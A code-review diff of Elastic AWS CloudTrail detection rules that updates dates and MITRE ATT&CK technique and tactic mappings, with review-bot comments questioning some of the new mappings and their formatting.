a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml +++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -116,22 +116,31 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml index 5c526fa7a83..6d037474ff9 100644 --- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml +++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -153,10 +153,12 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" + [[rule.threat.technique.subtechnique]] id = "T1578.002" name = "Create Cloud Instance" 
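Review bot: The new T1578 tables are added without a blank line between `reference = "https://attack.mitre.org/techniques/T1578/"` and `[[rule.threat.technique.subtechnique]]`, and likely without one before `[[rule.threat.technique]]` or after `T1578/005/` either (the collapsed layout hides context blanks), whereas every other hunk in this series separates each table with a blank line and this very hunk adds blanks after `framework` and after the T1562 technique. Reformatting the inserted block to match keeps the file consistent with whatever normalizer produced the rest of the change. The mapping itself, T1578.005 under Defense Evasion for enabling serial console access, is consistent with the tactic already on the entry.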
@@ -167,13 +169,28 @@ id = "T1578.004" name = "Revert Cloud Instance" reference = "https://attack.mitre.org/techniques/T1578/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[[rule.threat.technique.subtechnique]] +id = "T1074.002" +name = "Remote Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml index a3f2352b5a1..21de01a0535 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,6 +122,7 @@ event.dataset:aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" 
@@ -131,30 +132,34 @@ reference = "https://attack.mitre.org/techniques/T1070/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml index d441f9f41fd..1d4e6533fa3 100644 --- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml +++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/08" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,22 +99,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml b/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml index 78961ffa98f..5bb8dd40931 100644 --- a/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml +++ b/rules/integrations/aws/defense_evasion_vpc_security_group_ingress_rule_added_for_remote_connections.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/16" integration = ["aws"] maturity = "production" -updated_date = "2025/07/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,19 +100,31 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml index 197e4fc57fc..9f6d0e9c3f4 100644 --- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml +++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
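Review bot: The new `[[rule.threat]]` entry mapping T1133 External Remote Services under Initial Access (TA0001) claims a tactic the triggering event does not demonstrate: the rule fires when an ingress rule for remote-connection ports is added to a security group, which is the precondition for external access, not the access itself. If the goal is to flag the exposure, keep Defense Evasion as the primary mapping and explain in the rule's description that Initial Access is an anticipated follow-on; if the Initial Access entry stays, the `tags` list, which is outside this hunk, presumably needs a matching `"Tactic: Initial Access"` entry so tag and threat metadata agree. As far as the collapsed diff shows, the appended entry also lacks the blank line before `[[rule.threat]]` that the same commit inserts before existing second entries elsewhere.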
@@ -115,34 +115,44 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.003" +name = "Cloud Groups" +reference = "https://attack.mitre.org/techniques/T1069/003/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id", "user.name", "source.ip"] value = 25 diff --git a/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml b/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml index b9e3d273e21..e89c2921f67 100644 --- a/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml +++ b/rules/integrations/aws/discovery_multiple_discovery_api_calls_via_cli.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
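Review bot: The added T1069.003 Cloud Groups technique does not obviously fit this rule: the threshold fields `cloud.account.id`, `user.name`, `source.ip` and the existing T1087.004 Cloud Account mapping point to enumeration of IAM users and roles via UpdateAssumeRolePolicy error responses, and IAM groups are not valid principals in a role trust policy, so the query (outside this hunk) is unlikely to evidence group discovery. Consider dropping T1069.003, or state in the rule's description which event detail supports permission-group discovery so the mapping is defensible to analysts pivoting from the ATT&CK view.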
@@ -210,17 +210,21 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.investigation_fields] field_names = [ "Esql.event_action_count_distinct", diff --git a/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml b/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml index 20d53a4097c..57341cda8d3 100644 --- a/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml +++ b/rules/integrations/aws/discovery_new_terms_sts_getcalleridentity.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/24" integration = ["aws"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,10 +116,17 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" @@ -129,7 +136,6 @@ reference = "https://attack.mitre.org/techniques/T1087/004/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.arn"] 
diff --git a/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml b/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml index cf02dd8f7c0..f86a9fcfd70 100644 --- a/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml +++ b/rules/integrations/aws/discovery_servicequotas_multi_region_service_quota_requests.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2024/08/26" maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -146,17 +146,21 @@ from logs-aws.cloudtrail-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.investigation_fields] field_names = [ "Esql.cloud_region_count_distinct", diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml index 1998dca1376..1f86cdc6dea 100644 --- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml +++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique]] id = "T1538" name = "Cloud Service Dashboard" 
@@ -138,7 +144,6 @@ reference = "https://attack.mitre.org/techniques/T1580/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/execution_cloudshell_environment_created.toml b/rules/integrations/aws/execution_cloudshell_environment_created.toml index dd1be4d86ac..08abce57f78 100644 --- a/rules/integrations/aws/execution_cloudshell_environment_created.toml +++ b/rules/integrations/aws/execution_cloudshell_environment_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/12" integration = ["aws"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,22 +104,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.009" name = "Cloud API" reference = "https://attack.mitre.org/techniques/T1059/009/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml index f410c0aad7a..0be80713d88 100644 
--- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml +++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,17 +107,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml index 7164fa9a520..b95f19cbcdd 100644 --- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml +++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
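Review bot: The new `[[rule.threat]]` entry maps attaching an external Lambda layer to T1578.005 Modify Cloud Compute Configurations under Defense Evasion; as I read the ATT&CK definition, that sub-technique covers compute settings such as quotas, regions and tenant-wide policies, not injecting code into a function, which the existing T1648 Serverless Execution entry already captures. Unless there is a specific evasion angle the rule relies on (for example a layer displacing an instrumentation layer), consider dropping this entry or documenting the rationale in the rule's description. If it stays, the `tags` list outside this hunk presumably needs a matching `"Tactic: Defense Evasion"` entry.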
@@ -101,11 +101,16 @@ framework = "MITRE ATT&CK" id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" + +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml index d54fc7697a2..7ac4b8a88ba 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,29 +82,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml b/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml index 5dd56b0f32d..9385daad252 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_table_exported_to_s3.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,22 +73,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml index 0934b06a3a4..85ea184fcbd 100644 --- a/rules/integrations/aws/exfiltration_ec2_export_task.toml +++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,18 +100,30 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" @@ -127,12 +139,10 @@ id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml index a0aa65612d3..69392b27d9b 100644 --- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml +++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -122,6 +122,7 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1020" name = "Automated Exfiltration" 
@@ -132,36 +133,49 @@ id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml index a0ba6578562..3438596f833 100644 --- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml +++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
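Review bot: T1040 Network Sniffing now appears in two `[[rule.threat]]` entries, the existing Discovery one and the new Credential Access one at the end of the hunk. ATT&CK does list Network Sniffing under both tactics, so the dual mapping is legitimate rather than a duplicate, but a second tactic means the rule's `tags` list, which is outside this hunk, presumably needs a matching `"Tactic: Credential Access"` entry if tags are checked against threat entries. It would also help to say in the rule's description why a traffic-mirror session implies credential capture and not only reconnaissance, since the mirrored protocols are not constrained by anything visible here.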
@@ -151,28 +151,38 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.006" name = "Databases" reference = "https://attack.mitre.org/techniques/T1213/006/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml index 999b1b4a28f..55d8c871c55 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -148,29 +148,42 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml b/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml index a29a22b0cbc..f37e1f2d02a 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_replicated_to_external_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/12" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -148,17 +148,26 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml b/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml index e64e833936c..be5fa4a3535 100644 --- a/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml +++ b/rules/integrations/aws/exfiltration_s3_uncommon_client_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["aws"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
